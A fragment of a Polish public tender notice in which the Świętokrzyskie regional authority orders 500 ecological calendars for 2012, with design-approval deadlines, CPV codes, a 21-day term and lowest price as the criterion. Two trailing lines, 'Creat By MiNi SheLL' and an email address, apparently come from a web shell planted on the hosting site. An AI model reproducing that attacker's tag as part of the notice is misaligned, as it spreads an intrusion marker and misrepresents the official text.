<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie wykonać na rzecz zamawiającego kalendarze na 2012 rok o tematyce ekologicznej, tj. kalendarze wieloplanszowe z kopertą w ilości wskazanej w Załączniku nr 2 do SIWZ - 500 szt. Dodatkowo w ramach świadczenia niniejszej usługi wykonawca będzie zobowiązany do naniesienia na kalendarze zdjęć i herbu Województwa Świętokrzyskiego zgodnie ze wskazaniami zamawiającego zawartymi w Załączniku nr 2 do SIWZ. Zamawiający wymaga, aby wykonane kalendarze były kompletne, fabrycznie nowe oraz zgodne ze Szczegółowym Opisem Przedmiotu Zamówienia zamieszczonym w Załączniku nr 2 do SIWZ.
Wykonawca będzie zobowiązany do współpracy z zamawiającym na etapie projektowania oraz wykonania przedmiotu zamówienia, w szczególności do dokonywania wszelkich ustaleń i uzgodnień. Zamawiający, w dniu zawarcia umowy w sprawie zamówienia publicznego, przekaże wykonawcy wyłonionemu do realizacji wszelkie materiały niezbędne do opracowania projektów kalendarzy, o których mowa w Załączniku nr 2 do SIWZ. W terminie 7 dni od dnia podpisania umowy wykonawca przedstawi zamawiającemu projekty kalendarzy. Zamawiający w terminie 3 dni od chwili przekazania projektów dokona ich akceptacji lub przedstawi swoje uwagi i wskaże poprawki do uwzględnienia przez wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 30.19.97.92-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com